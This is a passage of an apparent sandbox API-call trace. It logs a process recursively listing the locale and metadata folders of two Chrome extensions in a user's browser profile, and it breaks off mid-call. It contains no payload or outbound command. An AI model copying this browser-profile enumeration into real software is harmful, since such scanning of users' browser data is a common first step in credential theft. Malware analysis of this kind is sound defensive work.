hHeap=0x20f0000) returned 1 [0142.430] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.431] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.431] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.431] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.432] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.432] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.432] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.432] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.432] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.432] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.433] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.433] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.434] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.434] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.434] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.434] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.441] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.441] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.441] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.441] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.441] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.441] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.442] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.442] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.442] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.443] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.443] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.443] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.444] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.444] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.444] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.444] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.444] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.444] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.445] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.445] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.445] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.446] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.446] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.446] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.447] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.447] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.447] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.447] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.448] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.448] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.448] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.449] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.449] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.449] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.450] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.450] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.450] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0142.450] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0142.450] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\*", lpFindFileData=0x2b4dac8 | out: lpFindFileData=0x2b4dac8) returned 0xa32d68 [0142.451] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0142.451] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0142.451] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0142.451] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0142.451] FindClose (in: hFindFile=0xa32ce8 | out: hFindFile=0xa32ce8) returned 1 [0142.451] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0142.453] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\*", lpFindFileData=0x2b4dfd0 | out: lpFindFileData=0x2b4dfd0) returned 0xa32ce8 [0142.453] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\*", lpFindFileData=0x2b4dd4c | out: lpFindFileData=0x2b4dd4c) returned 0xa32d28 [0142.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\*", lpFindFileData=0x2b4dac8 | out: lpFindFileData=0x2b4dac8) returned 0xa32d68 [0142.963] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.964] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.964] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.964] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.964] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.964] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.964] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.119] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.119] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.119] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.120] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.120] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.120] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.160] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.160] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.160] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.160] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.161] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.161] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.164] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.164] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.164] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.164] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.164] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.164] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.307] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.307] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.307] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.778] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.778] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.778] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.778] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.778] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.778] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.780] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.780] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.780] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.781] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.781] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.781] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.782] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.782] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.782] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.782] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.782] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.782] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.783] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.783] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.783] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.783] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.784] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.784] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.784] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.786] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.786] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.786] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.787] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.787] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.787] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.788] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.788] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.788] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.788] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.788] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.789] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.789] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.789] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.789] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.789] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.789] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.790] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.790] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.790] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.790] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.790] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.790] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.791] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.791] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.791] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.792] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.792] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.792] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.793] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.793] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.793] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.793] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.793] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.793] FindFirstFileW (in: 